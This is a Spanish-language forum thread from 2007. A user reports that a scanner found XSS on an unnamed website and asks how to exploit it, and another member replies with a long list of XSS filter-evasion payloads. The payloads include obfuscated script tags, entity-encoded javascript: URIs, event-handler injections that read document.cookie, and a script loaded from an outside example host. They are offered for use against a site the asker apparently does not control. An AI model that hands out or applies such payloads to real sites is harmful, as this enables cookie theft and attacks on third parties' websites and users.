Ayuda Con XSS

Iniciado por Wolftein, 29 Septiembre 2007, 20:59 PM

0 Miembros y 1 Visitante están viendo este tema.

Wolftein

Hola Q Tal..

Estoy Nesecitando Ayuda.. Acabo De Scanear Una Pagina Con El Segurity Shadow Scanner Y me Salta Que Tiene Vulnerabilidad de XSS

http://WEB/?N=D
http://WEB/enlaces/?N=D
http://WEB/analog/?N=D

ADemas Me Salta: Apache Mod_IMAP Referer Cross-Site Scripting Vulnerability

Alguien Me Podria Ayudar?

‭lipman

Ayuda a qué?

Tendrias que cambiar el D por el código, o a que te refieres?

Wolftein


dimitrix

CitarADemas Me Salta: Apache Mod_IMAP Referer Cross-Site Scripting Vulnerability
???

Supongo que si pones http://WEB/?N=D y no la web, no te podremos ayudar tanto, seguramente no la pondrás, para poder decir "Lo descubri yo", o quien sabe, la cuestión es que si no nos dices la web, no te podremos ayudar igual.





Falso Positivo

Hola, a lo mejor se pueden estar filtrando algunos caracteres para evitar el XSS.
Una vez alguien del foro que no recuerdo dejo una lista de codigos para SQL injection y me sirvio bastante.
Asi que dejo mi lista para XSS.
Prueba estos:

>"><ScRiPt%20%0a%0d>alert(1446033991)%3B</ScRiPt>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=&#x22;&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;
&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x50;&#x4C;&#x41;&#x59;&#x48;
&#x41;&#x43;&#x4B;&#x2E;&#x4E;&#x45;&#x54;&#x27;&#x29;&#x22;>

<IMG SRC="javascript:alert(String.fromCharCode(88,83,83))">

<SCRIPT/XSS SRC="http://example.com/xss.js"></SCRIPT>

<<SCRIPT>alert("XSS");//<</SCRIPT>

<iframe src=http://example.com/scriptlet.html <

<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">

<BODY BACKGROUND="javascript:alert('XSS')">

<BODY ONLOAD=alert(document.cookie)>

<IMG DYNSRC="javascript:alert('XSS')">

<IMG DYNSRC="javascript:alert('XSS')">

<BR SIZE="&{alert('XSS')}">

<IMG SRC='vbscript:msgbox("XSS")'>

<TABLE BACKGROUND="javascript:alert('XSS')">

<DIV STYLE="width: expression(alert('XSS'));">

<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">

<STYLE TYPE="text/javascript">alert('XSS');</STYLE>

<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>

<?='<SCRIPT>alert("XSS")</SCRIPT>'?>

<A HREF="javascript:document.location='http://www.example.com/'">XSS</A>

···FROM PROVENTIA···

-->//"><script>alert(/XSS%20vulnerability%20proventia%20s0x by Alex Hernandez/);</script>

-->//"><script>alert(document.cookie)</script>

-->//"><script>alert(document.domain)</script>


Saludos.
Don't worry, be hacked....